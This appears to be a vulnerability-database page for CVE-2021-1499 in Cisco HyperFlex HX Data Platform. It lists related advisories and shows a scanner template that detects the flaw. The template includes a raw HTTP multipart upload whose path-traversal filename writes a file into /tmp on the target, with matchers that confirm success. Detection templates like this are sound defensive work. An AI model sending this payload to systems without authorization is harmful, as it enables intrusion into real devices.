| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Cisco HyperFlex HX Data Platform File Upload / Remote Code Execution Exploit | 17 Jun 202100:00 | – | zdt | |
| CVE-2021-1499 | 5 May 202100:00 | – | attackerkb | |
| The vulnerability in the web interface for managing data storage systems in Cisco HyperFlex HX Data Platform’s hyper-converged infrastructure allows a malicious actor to upload arbitrary files. | 15 Jun 202100:00 | – | bdu_fstec | |
| CVE-2021-1499 | 6 May 202113:51 | – | circl | |
| Cisco HyperFlex HX Data Platform File Upload Vulnerability | 5 May 202116:00 | – | cisco | |
| Cisco HyperFlex HX Data Platform 访问控制错误漏洞 | 5 May 202100:00 | – | cnnvd | |
| Cisco HyperFlex HX Data Platform Access Control Error Vulnerability | 7 May 202100:00 | – | cnvd | |
| Cisco HyperFlex HX Directory Traversal (CVE-2021-1499) | 20 Jun 202100:00 | – | checkpoint_advisories | |
| CVE-2021-1499 | 6 May 202112:41 | – | cve | |
| CVE-2021-1499 Cisco HyperFlex HX Data Platform File Upload Vulnerability | 6 May 202112:41 | – | cvelist |
id: CVE-2021-1499
info:
name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
author: gy741
severity: medium
description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
impact: |
Allows an attacker to upload and execute arbitrary files on the target system
remediation: |
Apply the necessary security patches or updates provided by Cisco
reference:
- https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
- http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-1499
- https://github.com/Z0fhack/Goby_POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2021-1499
cwe-id: CWE-306
epss-score: 0.80426
epss-percentile: 0.99574
cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cisco
product: hyperflex_hx220c_af_m5
tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco,vuln
http:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
Origin: {{RootURL}}
Referer: {{RootURL}}
-----------------------------253855577425106594691130420583
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
Content-Type: application/json
MyPasswdNewData->/api/tomcat
-----------------------------253855577425106594691130420583--
matchers-condition: and
matchers:
- type: word
words:
- '{"result":'
- '"filename:'
- '/tmp/passwd9'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 4b0a00483046022100800c69d2cb2191b96b28756ea47efad839345244c3c8de014aa79fa9f65210d6022100b8b2e9009520ec3d1e66d44278b33835c7a78e0a1836cba36a83fdccbf69cd3f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation